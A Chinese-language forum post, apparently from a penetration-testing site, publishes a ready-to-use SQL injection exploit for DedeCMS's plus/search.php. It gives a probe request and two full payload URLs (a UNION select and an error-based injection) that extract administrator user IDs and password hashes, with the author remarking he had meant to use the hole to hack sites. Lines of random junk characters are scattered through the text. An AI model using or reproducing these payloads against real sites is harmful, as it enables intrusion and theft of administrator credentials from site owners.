中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
8 z& a* L: E H1 Q9 I5 s
* b5 o9 h6 f9 o" p3 ?5 x! L' b9 c
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
7 w. ]) Z& @' ^+ C, Q
! w7 @8 B" ~+ T" R: z5 h! V a
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; S: y* O2 x1 s' C- Y' |
% i& Z" R6 D( c1 n% ]4 q3 G
我一般是这样测试的:
/ j5 n2 {. R v) o: `% ^ N
% |! C' `" M6 S3 }% @# t$ s" @+ r/ E
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
8 I9 B* x/ L3 V6 b v& z
- u1 j- z, R3 P1 }
转载不加作者名的没JJ
: ]1 H+ T8 e3 M
- m7 B& h- b: z; _7 Q
作者:鬼哥
- b& a* e- ]* r, A
$ O: r6 |3 I/ S: G
! I; H. h6 S; o( v' {
1 J% |8 |* z% d: I1 E1 U* A
看结果如果提示
) ]; A! l$ P2 z7 M: J) M
0 f( G$ w7 n9 J, ~; O: D/ V
Safe Alert: Request Error step 2 !
O" a+ c b& `3 B& k
" U' D) U3 \4 ^ g
那么直接用下面的exp
: t" v. ^* V' M( b5 u+ K% p
" a5 ?. Q# Q- Z" p6 a% i+ a' V
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
8 A$ I7 U! ?! e8 y N
; h: Y q$ V. r: D8 t, x
* b4 W7 ^" v- ^, Q" P5 K. x' T ~
看结果如果提示
( V0 m+ T2 R1 L6 e7 r
1 n& T7 M. z0 ]* R, Z5 K/ x" z9 _& w
Safe Alert: Request Error step 1 !
& Z$ W: J; `" M
6 l" O: L8 z% r6 q
那么直接用下面的exp
. o, P1 R5 e' M4 Y
6 K! g$ D, u& D& p% E. U
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
" p7 O4 } i' R" X' \( u% k
/ c& z9 ~, l, p" r0 Z X
+ I, C! @: R/ Q* ]0 ^: }
如果正常显示证明漏洞不存在了。
( k6 F% z4 n. d6 Y0 v `4 N
, j+ |5 M; t2 l5 F+ L
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2